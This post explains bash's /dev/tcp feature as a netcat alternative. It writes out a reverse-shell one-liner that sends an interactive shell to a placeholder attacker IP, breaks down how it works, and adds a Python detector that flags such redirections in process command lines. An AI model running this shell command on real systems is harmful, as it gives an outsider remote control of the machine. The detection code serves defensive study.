Netcat alternative: /dev/tcp

Netcat with no netcat: /dev/tcp.

This is a feature of bash (available on most systems) that lets a command line talk directly to the machine's TCP stack. Anything written to /dev/tcp/[ipAddress]/[port] is sent over a TCP connection that bash opens to that address and port. You can leverage this to send a command shell across the network to a listener by invoking the following command:

/bin/bash -i > /dev/tcp/[attackerIP]/[port] 0<&1 2>&1

Here's the breakdown:

Bash is started in interactive (-i) mode with its standard output redirected to /dev/tcp/[attackerIP]/[port], which makes bash open a TCP connection to that IP on that port. The trailing 0<&1 makes standard input a copy of standard output (the socket), and 2>&1 does the same for standard error, so the shell's input, output and errors all travel over the connection.
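Because bash resolves /dev/tcp/... inside its own redirection code rather than through a real device file, the only host-side artifact is the command line itself. The following detection example is added here and is not part of the original post; it scans constructed process command lines (illustrative, not real captures) for /dev/tcp redirections and ranks a shell whose standard input is wired to the socket above a bare port-reachability probe. The regex names, the Finding class and the sample lines are all assumptions made for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample command lines, in the shape of a process-creation "cmd" field.
SAMPLE_COMMANDS = [
    # The post's invocation, with a documentation-range IP substituted for the placeholder
    "/bin/bash -i > /dev/tcp/203.0.113.10/4444 0<&1 2>&1",
    # Benign use of the same feature: a port-reachability probe, no shell input from the socket
    "timeout 3 bash -c '</dev/tcp/db.internal.example/5432' && echo open",
    # The path string merely appears as an argument; nothing is redirected to it
    "echo 'see /dev/tcp/203.0.113.10/4444 in the runbook' >> notes.txt",
    # Unrelated command
    "sh -c 'cat /etc/hostname'",
]

# A /dev/tcp or /dev/udp path with host and port components.
DEVTCP_RE = re.compile(r"/dev/(tcp|udp)/([A-Za-z0-9._-]+)/(\d{1,5})")
# The path used as the target of a redirection operator (optionally fd-prefixed), e.g. "> /dev/tcp/" or "</dev/tcp/".
REDIRECT_RE = re.compile(r"\d?[<>]{1,2}\s*/dev/(tcp|udp)/")
# An interactive shell ("bash -i", "sh -i").
INTERACTIVE_SHELL_RE = re.compile(r"(^|[\s/])(ba)?sh\s+-i\b")
# Standard input duplicated from another descriptor, e.g. "0<&1" or "<&1".
STDIN_DUP_RE = re.compile(r"(^|\s)0?<&\d")


@dataclass
class Finding:
    command: str
    host: str
    port: int
    severity: str  # "high" or "low"
    reason: str


def classify(cmd: str) -> Optional[Finding]:
    """Return a Finding if cmd redirects to /dev/tcp or /dev/udp, else None."""
    path = DEVTCP_RE.search(cmd)
    if not path or not REDIRECT_RE.search(cmd):
        # Either no socket path at all, or the path is only mentioned as an argument.
        return None
    host, port = path.group(2), int(path.group(3))
    if INTERACTIVE_SHELL_RE.search(cmd) or STDIN_DUP_RE.search(cmd):
        # A shell reading its input from the connection: this is the reverse-shell shape.
        return Finding(cmd, host, port, "high", "shell with standard input wired to the socket")
    # Output-only or input-only redirection with no shell consuming the socket: likely a probe.
    return Finding(cmd, host, port, "low", "/dev/tcp redirection without shell input from the socket")


def scan(commands: List[str]) -> List[Finding]:
    """Classify every command line and keep only those that touch /dev/tcp or /dev/udp."""
    return [f for f in (classify(c) for c in commands) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f"[{f.severity}] {f.host}:{f.port}  {f.reason}\n    {f.command}")
```

In practice the input would be the command-line field of auditd execve records or EDR process-creation events rather than an inline list. The two-tier severity matters because /dev/tcp is also a legitimate netcat substitute for checking whether a port is reachable; only the combination of a redirection to the socket and a shell taking its input from it should page anyone.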
